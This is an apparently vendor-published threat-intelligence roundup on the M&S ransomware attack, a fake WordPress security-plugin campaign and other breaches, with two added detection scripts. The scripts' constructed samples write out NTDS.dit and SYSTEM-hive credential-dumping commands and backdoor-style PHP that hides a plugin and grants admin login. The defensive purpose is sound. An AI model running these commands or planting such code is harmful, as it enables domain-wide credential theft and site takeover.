Content
01. News Bites
- Co-op confirms attempted cyberattack disrupting back office systems
- New WordPress malware campaign uses fake security plugin to hijack sites
- SK Telecom hit by data breach, 23 million users offered free SIM replacements
- MTN reports data breach impacting customers in select markets
- Governor addresses ransomware at JFL Hospital as US Virgin Islands faces ongoing cyber threats
02. Conclusion
Marks & Spencer cyber disruption linked to ‘Scattered Spider’
Marks & Spencer’s ongoing cyber disruption has now been attributed to a ransomware attack carried out by the notorious threat group known as Scattered Spider. Sources revealed to BleepingComputer that the attack, which encrypted virtual machines on April 24th, disrupted systems including contactless payments and warehouse operations—forcing around 200 staff to stay home.
The attackers reportedly breached the retailer as early as February and stole a copy of NTDS.dit, the Active Directory database that holds the password hashes for every domain account. With those hashes they moved laterally through the network and, on April 24th, deployed the DragonForce ransomware on VMware ESXi hosts. A stolen NTDS.dit means every domain credential, including the krbtgt account, has to be treated as compromised, so recovery requires a full credential reset rather than a rebuild of the affected hosts alone.
Scattered Spider, also known as Octo Tempest or UNC3944, is a loosely affiliated group known for phishing, MFA push bombing (fatigue attacks), SIM swapping, and advanced social engineering. Members are believed to be young, English-speaking, and active on hacker forums.
M&S has engaged CrowdStrike, Microsoft, and Fenix24 for incident response. The investigation remains ongoing, and M&S has declined to comment on specific details of the attack.
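The NTDS.dit theft described above is the step defenders can most readily catch: the database is locked while a domain controller runs, so attackers almost always reach it through a Volume Shadow Copy, ntdsutil's IFM export or esentutl, and then also save the SYSTEM hive to recover the boot key that protects the hashes. The following is an added example, not code from this bulletin, from M&S or from any of the responders named; it applies that logic to a constructed, pipe-delimited process-creation feed. The feed format, host names and command lines are assumptions made up for the demonstration.

```python
"""Detect NTDS.dit credential dumping in process-creation telemetry.

Added example, not code from the bulletin, M&S or any responder named in it.
Input is a constructed pipe-delimited feed (timestamp|host|user|command line),
the shape a SIEM might normalise Windows Security 4688 / Sysmon 1 events into.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    cmdline: str


# NTDS.dit is locked while the DC runs, so it is usually copied out of a
# Volume Shadow Copy, exported with ntdsutil "Install From Media" (IFM), or
# pulled with esentutl /vss. Hashes inside it are encrypted with the boot key,
# so a save of the SYSTEM hive normally follows (MITRE ATT&CK T1003.003/.002).
RULES = {
    "ntdsutil_ifm": re.compile(r"ntdsutil.*\b(ifm|ac i ntds)\b", re.I),
    "esentutl_vss_copy": re.compile(r"esentutl.*/vss.*ntds\.dit", re.I),
    "ntds_dit_on_cmdline": re.compile(r"ntds\.dit", re.I),
    "shadow_copy_create": re.compile(
        r"(vssadmin|wmic\s+shadowcopy|diskshadow).*\bcreate\b", re.I),
    "system_hive_save": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I),
}
# Rules showing the database itself was touched, not just a precursor.
NTDS_ACCESS = {"ntdsutil_ifm", "esentutl_vss_copy", "ntds_dit_on_cmdline"}


def parse_events(feed: str) -> list[Event]:
    """Parse the constructed feed; split only three times because command
    lines may themselves contain '|'."""
    events = []
    for line in feed.strip().splitlines():
        ts, host, user, cmd = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(ts), host, user, cmd))
    return events


def match_rules(event: Event) -> set[str]:
    return {name for name, rx in RULES.items() if rx.search(event.cmdline)}


def assess(events: list[Event], window: timedelta = timedelta(minutes=30)) -> dict:
    """Group hits per host and rate them.

    low    - only a shadow copy was created (backup software does this too)
    medium - NTDS.dit was read or exported
    high   - NTDS.dit access plus a SYSTEM hive save on the same host inside
             `window`: everything needed to crack every domain hash offline
    """
    per_host: dict[str, list] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        for rule in match_rules(ev):
            per_host[ev.host].append((ev.ts, rule, ev.user, ev.cmdline))

    findings = {}
    for host, hits in per_host.items():
        rules_hit = {r for _, r, _, _ in hits}
        severity = "low"
        if rules_hit & NTDS_ACCESS:
            severity = "medium"
            ntds_times = [t for t, r, _, _ in hits if r in NTDS_ACCESS]
            hive_times = [t for t, r, _, _ in hits if r == "system_hive_save"]
            if any(abs(a - b) <= window for a in ntds_times for b in hive_times):
                severity = "high"
        findings[host] = {"severity": severity, "rules": sorted(rules_hit), "hits": hits}
    return findings


# Constructed sample telemetry, not real logs. DC01 shows the full chain;
# BACKUP01 only creates a shadow copy, as a nightly backup job would.
SAMPLE_FEED = r"""
2025-04-24T02:11:40|DC01|CORP\svc_backup|vssadmin create shadow /for=C:
2025-04-24T02:12:05|DC01|CORP\svc_backup|cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\Windows\Temp\n.dit
2025-04-24T02:12:31|DC01|CORP\svc_backup|reg.exe save HKLM\SYSTEM C:\Windows\Temp\sys.hiv
2025-04-24T03:00:00|BACKUP01|NT AUTHORITY\SYSTEM|vssadmin create shadow /for=D:
2025-04-24T03:05:12|WS07|CORP\jdoe|notepad.exe C:\Users\jdoe\notes.txt
"""

if __name__ == "__main__":
    for host, f in assess(parse_events(SAMPLE_FEED)).items():
        print(f"{host}: {f['severity']} {f['rules']}")
```

The correlation is what keeps the noise down: shadow copies and even references to ntds.dit occur in legitimate backup jobs, but a SYSTEM hive save on the same host within minutes of an NTDS.dit copy is the combination an attacker needs and an administrator rarely produces by hand.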
Co-op confirms attempted cyberattack disrupting back office systems
British supermarket chain Co-op has confirmed it recently detected attempted unauthorised access to its systems, prompting it to shut down parts of its IT infrastructure as a precaution. The incident caused disruption to back office and call centre operations, although Co-op stores, funeral services, and online delivery platforms remain unaffected.
A Co-op spokesperson said, “We have recently experienced attempts to gain unauthorised access to some of our systems. As a result, we have taken proactive steps to keep our systems safe, which has resulted in a small impact.”
Co-op, which operates over 3,700 stores and supplies more than 5,100 additional outlets across the UK, has not revealed whether the intrusion attempts were successful. No group has yet claimed responsibility.
The incident follows a major ransomware attack on Marks & Spencer last week, attributed to the Scattered Spider group, raising concerns about growing cyber threats to UK retail. Investigations into both attacks continue.
New WordPress malware campaign uses fake security plugin to hijack sites
Security researchers at Wordfence have uncovered a malware campaign targeting WordPress sites with a plugin that masquerades as a security tool. The plugin gives attackers persistent administrator access, lets them execute code on the server and inject malicious JavaScript into pages, and hides itself from the plugin list in the WordPress dashboard.
Discovered during a site cleanup in January 2025, the infection is driven by a tampered wp-cron.php file that installs and reactivates a plugin called WP-antymalwary-bot.php. Because WordPress runs wp-cron.php on ordinary page loads, deleting the plugin alone is not enough: the next visit to the site reinstalls it. Other file names used in the campaign include addons.php, wpconsole.php, and wp-performance-booster.php.
Once active, the plugin logs the attackers in through a hidden "emergency login" function, injects PHP into theme files through a custom REST API route it registers, and can insert base64-encoded JavaScript into the site's <head>.
Wordfence suspects compromised hosting or FTP credentials as the initial infection vector. Site owners are urged to review wp-cron.php, the active theme's header.php, and access logs for suspicious requests, and to rotate hosting, FTP and WordPress administrator credentials after cleanup, since credential theft is the suspected entry point.
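As an added triage aid (not Wordfence's code and not the campaign's own), the script below walks a WordPress install and reports the indicators the write-up names: the four plugin file names, a wp-cron.php that writes or activates plugins, and base64-blob JavaScript inside script tags in a theme's header.php. It also applies two generic backdoor heuristics that are assumptions of this example rather than published indicators for this campaign: a plugin that filters the all_plugins list (the usual way a plugin hides itself from the dashboard) and a plugin that calls wp_set_auth_cookie() directly. The site it scans is constructed in a temporary directory; the PHP in it is illustrative and is never executed.

```python
"""Triage a WordPress install for the fake-security-plugin campaign.

Added example, not Wordfence's code and not the campaign's malware. The
campaign file names and the wp-cron.php / header.php checks follow the write-up;
the all_plugins-filter and wp_set_auth_cookie() checks are generic heuristics
for hidden backdoor plugins and are this example's assumption.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Plugin file names reported for the campaign (compared case-insensitively).
CAMPAIGN_FILES = {"wp-antymalwary-bot.php", "addons.php", "wpconsole.php",
                  "wp-performance-booster.php"}

# Stock wp-cron.php only loads WordPress and fires scheduled hooks; it never
# writes files, activates plugins or decodes base64.
CRON_RX = re.compile(
    r"file_put_contents\s*\(|activate_plugin\s*\(|base64_decode\s*\(|"
    + "|".join(re.escape(n) for n in sorted(CAMPAIGN_FILES)), re.I)
SCRIPT_RX = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# Decoder call or a long run of base64 alphabet inside a script body.
B64_JS_RX = re.compile(r"atob\s*\(|[A-Za-z0-9+/]{60,}={0,2}")
# Heuristics (assumptions): a plugin that edits the plugin list hides itself;
# a plugin that sets an auth cookie directly is logging someone in by itself.
HIDE_RX = re.compile(r"""add_filter\s*\(\s*['"]all_plugins['"]""")
AUTH_RX = re.compile(r"wp_set_auth_cookie\s*\(")


def scan_wordpress(root: Path) -> list[tuple[str, str]]:
    """Return (check_name, path) pairs for every indicator found under root."""
    findings: list[tuple[str, str]] = []
    cron = root / "wp-cron.php"
    if cron.is_file() and CRON_RX.search(cron.read_text(errors="ignore")):
        findings.append(("wp_cron_tampered", str(cron)))
    for sub in ("wp-content/plugins", "wp-content/mu-plugins"):
        pdir = root / sub
        if not pdir.is_dir():
            continue
        for php in pdir.rglob("*.php"):
            if php.name.lower() in CAMPAIGN_FILES:
                findings.append(("campaign_plugin_file", str(php)))
            text = php.read_text(errors="ignore")
            if HIDE_RX.search(text):
                findings.append(("plugin_hides_from_list", str(php)))
            if AUTH_RX.search(text):
                findings.append(("auth_cookie_set_in_plugin", str(php)))
    themes = root / "wp-content/themes"
    if themes.is_dir():
        for header in themes.rglob("header.php"):
            bodies = SCRIPT_RX.findall(header.read_text(errors="ignore"))
            if any(B64_JS_RX.search(b) for b in bodies):
                findings.append(("header_injected_js", str(header)))
    return findings


def build_sample_site(root: Path) -> None:
    """Write a constructed WordPress tree showing the infection pattern.
    The PHP is illustrative only and is never executed."""
    (root / "wp-content/plugins/akismet").mkdir(parents=True)
    (root / "wp-content/plugins/WP-antymalwary-bot").mkdir(parents=True)
    (root / "wp-content/themes/twentytwentyfour").mkdir(parents=True)
    (root / "wp-content/plugins/akismet/akismet.php").write_text(
        "<?php\n/* Plugin Name: Akismet */\n")
    (root / "wp-content/plugins/WP-antymalwary-bot/WP-antymalwary-bot.php").write_text(
        "<?php\n/* Plugin Name: WP Anti-Malware Bot */\n"
        "add_filter('all_plugins', function ($p) {"
        " unset($p['WP-antymalwary-bot/WP-antymalwary-bot.php']); return $p; });\n"
        "if (isset($_GET['emergency_login'])) { wp_set_auth_cookie(1, true); }\n")
    (root / "wp-cron.php").write_text(
        "<?php\nrequire_once __DIR__ . '/wp-load.php';\n"
        "$dst = WP_PLUGIN_DIR . '/WP-antymalwary-bot/WP-antymalwary-bot.php';\n"
        "if (!file_exists($dst)) { file_put_contents($dst, $payload /* dropper body */); }\n"
        "activate_plugin('WP-antymalwary-bot/WP-antymalwary-bot.php');\n")
    (root / "wp-content/themes/twentytwentyfour/header.php").write_text(
        '<head>\n<script>eval(atob("' + "QUFB" * 30 + '"));</script>\n</head>\n')


def demo() -> list[tuple[str, str]]:
    """Build the constructed site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        return sorted(scan_wordpress(root))


if __name__ == "__main__":
    for check, path in demo():
        print(f"{check:26} {path}")
```

Against a live site, call scan_wordpress(Path("/var/www/html")) (or wherever wp-config.php lives) and treat every hit as something to read by hand rather than delete blindly; the order of cleanup matters, because restoring wp-cron.php from a clean WordPress release has to happen before the plugin directory is removed, or the next page load puts it back.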
SK Telecom hit by data breach, 23 million users offered free SIM replacements
South Korea’s largest mobile operator, SK Telecom, has disclosed a major data breach caused by a malware-based cyberattack, prompting its shares to drop as much as 8.5%—the lowest since August 2023. The breach, detected on April 18, is described by the company as a large-scale customer data leak, though specific details have not been released.
In response, SK Telecom said it would take full responsibility for any resulting harm and began offering free USIM (Universal Subscriber Identity Module) card replacements to all 23 million subscribers through more than 2,600 retail outlets nationwide. It is also urging customers to enrol in its USIM Protection Service, which the company presents as offering comparable protection for those who have not yet swapped their card. As of Sunday, around 5.54 million users had enrolled.
The incident marks one of the largest breaches in the region and raises fresh concerns about mobile infrastructure vulnerabilities and user data protection in telecom networks.
MTN reports data breach impacting customers in select markets
MTN Group has confirmed a data breach involving an “unknown third party” that accessed parts of its system, leading to the unauthorised exposure of customer data in some markets. While the exact number of affected individuals has not yet been disclosed, MTN has reported the breach to the South African Police Service (SAPS), the Directorate for Priority Crime Investigation (DPCI), and relevant authorities in other impacted countries.
The telecom giant assured that its core network, billing systems, and financial services infrastructure remain secure. “We have no evidence to suggest that customers’ accounts or wallets have been compromised,” the company said.
MTN is currently notifying affected users but has not provided further information on the nature of the breach or the type of data accessed. No cybercriminal group has claimed responsibility as of April 25, 2025. The incident follows a series of cyberattacks on South African telecoms, highlighting growing national security concerns.
Governor addresses ransomware at JFL Hospital as US Virgin Islands faces ongoing cyber threats
Governor Albert Bryan Jr. confirmed on Monday that Governor Juan F. Luis Hospital (JFL) is facing a ransomware incident, calling it “another crisis” for the already troubled facility. JFL disclosed the cyberattack on Sunday, stating that it had launched an investigation and taken steps to reduce risk. Despite the breach, the hospital assured the public that all clinical services remain fully operational.
The attack on JFL follows a recent ransomware incident at the Virgin Islands Lottery (VIL), which forced weeks of disruption. Hackers demanded a $1 million ransom—refused by VIL Director Raymond Williams—leading to a full system rebuild. VIL is set to reopen on April 29.
JFL has yet to reveal how much data was compromised but emphasised its commitment to protecting patient privacy. More details are expected as the investigation progresses, amid growing cybersecurity threats across the Virgin Islands’ public sector.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.
Disclaimer
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.